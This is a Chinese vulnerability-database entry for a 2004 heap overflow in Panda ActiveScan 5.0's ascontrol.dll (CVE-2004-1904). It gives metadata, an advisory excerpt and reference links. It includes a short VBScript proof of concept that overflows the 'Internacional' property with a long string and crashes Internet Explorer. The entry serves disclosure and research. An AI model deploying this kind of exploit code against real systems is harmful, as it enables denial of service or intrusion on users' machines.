Panda ActiveScan ASControl.DLL远程堆溢出漏洞

Panda ActiveScan ASControl.DLL远程堆溢出漏洞

漏洞ID 1107847 漏洞类型 缓冲区溢出
发布时间 2004-04-06 更新时间 2005-10-20
图片[1]-Panda ActiveScan ASControl.DLL远程堆溢出漏洞-安全小百科CVE编号 CVE-2004-1904
图片[2]-Panda ActiveScan ASControl.DLL远程堆溢出漏洞-安全小百科CNNVD-ID CNNVD-200412-733
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/23917
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-733
|漏洞详情
PandaActiveScan5.0版本的ascontrol.dll存在缓冲区溢出漏洞。远程攻击者借助后缀超长字符串的Internacionalproperty执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/10065/info

It has been reported that Panda ActiveScan may be prone to a remote heap overflow vulnerability that may allow an attacker to cause a denial of service condition in Internet Explorer or leverage the issue to execute arbitrary code.

The issue is reported to exist in the 'ascontrol.dll' file, specifically the 'Internacional' property of the 'ReportHebrew' object is identified as vulnerable.

Panda ActiveScan 5.0 has been reported to be prone to this issue. 

<script language=vbscript>
dim mymy
Set mymy = CreateObject("ASControl.ReportHebrew.1" )

a="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
mymy.Internacional a
</script>
|参考资料

来源:XF
名称:panda-activescan-ascontrol-bo(15764)
链接:http://xforce.iss.net/xforce/xfdb/15764
来源:BID
名称:10065
链接:http://www.securityfocus.com/bid/10065
来源:theinsider.deep-ice.com
链接:http://theinsider.deep-ice.com/texts/advisory53.txt
来源:SECUNIA
名称:11312
链接:http://secunia.com/advisories/11312
来源:BUGTRAQ
名称:20040406PandaActiveScan5.0-RemoteBufferOverflowandACrash(D.O.S)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108130573130482&w;=2

相关推荐: myServer cgi-lib.dll Remote Buffer Overflow Vulnerability

myServer cgi-lib.dll Remote Buffer Overflow Vulnerability 漏洞ID 1099494 漏洞类型 Boundary Condition Error 发布时间 2003-09-12 更新时间 2003-09-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享